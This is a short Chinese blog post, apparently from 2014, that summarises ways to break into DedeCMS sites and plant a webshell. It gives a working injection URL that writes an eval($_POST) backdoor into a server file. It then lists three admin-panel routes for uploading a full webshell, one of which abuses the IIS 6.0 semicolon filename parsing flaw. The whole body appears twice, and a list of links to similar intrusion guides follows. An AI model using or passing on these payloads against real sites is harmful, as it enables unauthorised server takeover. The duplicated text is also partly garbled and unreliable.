dedecms入侵拿webshell之方法总结
2014-03-30 20:38
190 查看
1、注入漏洞
存在注入地址:在域名下输入plus/digg_frame.php?action=good&id=1024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
http://localhost:802/plus/digg_frame.php?action=good&id=1024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
注入成功,产生了注入文件。
http://localhost:802/data/mysql_error_trace.php
一句话木马连接上传大马即可!
注入漏洞详解见 http://www.hackline.net/a/news/ldfb/2009/0830/323.html
2、后台拿webshell
第一种方法,利用文件管理直接创建php大马```
后台--核心--附件管理--文件式管理器 新建文件,写入大马文件直接访问。
如果没有安装文件管理器,可以查看下插件目录有没有此插件文件。
后台--模块--模块管理--文件管理器 点击安装,然后在创建php大马```
如果没有安装插件,并删除了插件目录就无法使用此方法。
第二种方法:利用标签源码管理
后台--模板--标签源码管理,随便选择一个标签 点编辑。文件名称输入:格式为。xxx.lib.php,内容输入大马文件即可。
第三种方法、利用模板修改。
此方法利用IIS解析漏洞,前提网站必须在IIS6.0运行。
后台--模板--默认模板管理,随便选择一个模板 点编辑。文件名输入dama.php;1.htm,内容输入大马文件即可。
注意,此情况输入密码可能导致跳转显示无法找到网页,你可以输入密码后,再访问dama.php;1.htm这样就可以了。因为解析时截断了文件名变成dama.php了。
存在注入地址:在域名下输入plus/digg_frame.php?action=good&id=1024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
http://localhost:802/plus/digg_frame.php?action=good&id=1024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
注入成功,产生了注入文件。
http://localhost:802/data/mysql_error_trace.php
一句话木马连接上传大马即可!
注入漏洞详解见 http://www.hackline.net/a/news/ldfb/2009/0830/323.html
2、后台拿webshell
第一种方法,利用文件管理直接创建php大马```
后台--核心--附件管理--文件式管理器 新建文件,写入大马文件直接访问。
如果没有安装文件管理器,可以查看下插件目录有没有此插件文件。
后台--模块--模块管理--文件管理器 点击安装,然后在创建php大马```
如果没有安装插件,并删除了插件目录就无法使用此方法。
第二种方法:利用标签源码管理
后台--模板--标签源码管理,随便选择一个标签 点编辑。文件名称输入:格式为。xxx.lib.php,内容输入大马文件即可。
第三种方法、利用模板修改。
此方法利用IIS解析漏洞,前提网站必须在IIS6.0运行。
后台--模板--默认模板管理,随便选择一个模板 点编辑。文件名输入dama.php;1.htm,内容输入大马文件即可。
注意,此情况输入密码可能导致跳转显示无法找到网页,你可以输入密码后,再访问dama.php;1.htm这样就可以了。因为解析时截断了文件名变成dama.php了。
相关文章推荐
- dedecms网站入侵拿webshell方法总结
- 经验总结 黑客入侵网络的50种方法3
- ASP漏洞+SQL注入的入侵方法总结
- 最全的Webshell提权方法总结
- WEBSHELL 提权方法总结
- 总结SQL入侵的突破方法
- 入侵网站简单方法总结
- 后台拿webshell的常用方法总结
- webshell路径中带分号点号如.asp,.asa,.cdx,.cer的访问方法总结
- Tomcat、Weblogic、JBoss、GlassFish、Resin、Websphere弱口令及拿webshell方法总结
- Java类WebServer及中间件拿webshell方法总结
- 后台拿webshell的常用方法总结
- 最全的Webshell提权方法总结
- 经验总结 黑客入侵网络的20种方法
- 上传方法总结[对入侵很实用]
- dedecms不能下载远程图片和资源方法总结
- webshell提权拿服务器方法总结
- DEDECMS之0day入侵总结
- 台拿WEBSHELL方法总结